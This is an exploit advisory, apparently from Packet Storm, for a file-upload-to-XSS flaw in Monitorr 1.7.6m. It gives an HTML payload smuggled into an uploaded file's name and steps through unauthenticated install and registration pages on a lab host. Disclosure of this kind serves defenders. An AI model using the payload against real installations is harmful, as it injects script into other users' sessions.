Montiorr version 1.7.6m suffers from a cross site scripting vulnerability via a file upload.
5e6dcee09ca3a6208dca09fa733156105f960720d70334ae602f8f337f70aaa0# Exploit Title: Montiorr 1.7.6m - File Upload to XSS
# Date: 25/4/2021
# Exploit Author: Ahmad Shakla
# Software Link: https://github.com/Monitorr/Monitorr
# Tested on: Kali GNU/Linux 2020.2
# Detailed Bug Description : https://arabcyberclub.blogspot.com/2021/04/monitor-176m-file-upload-to-xss.html
An attacker can preform an XSS attack via image upload
Steps :
1)Create a payload with the following format :
><img src=x onerror=alert("XSS")>.png
2) Install the database by going to the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/_install.php
3)Register for a new account on the server by going to the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php?action=register
4)Login with your credentials on the following link :
https://monitorr.robyns-petshop.thm/assets/config/_installation/vendor/login.php
5)Go to the following link and upload the payload :
https://monitorr.robyns-petshop.thm/settings.php#services-configuration
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed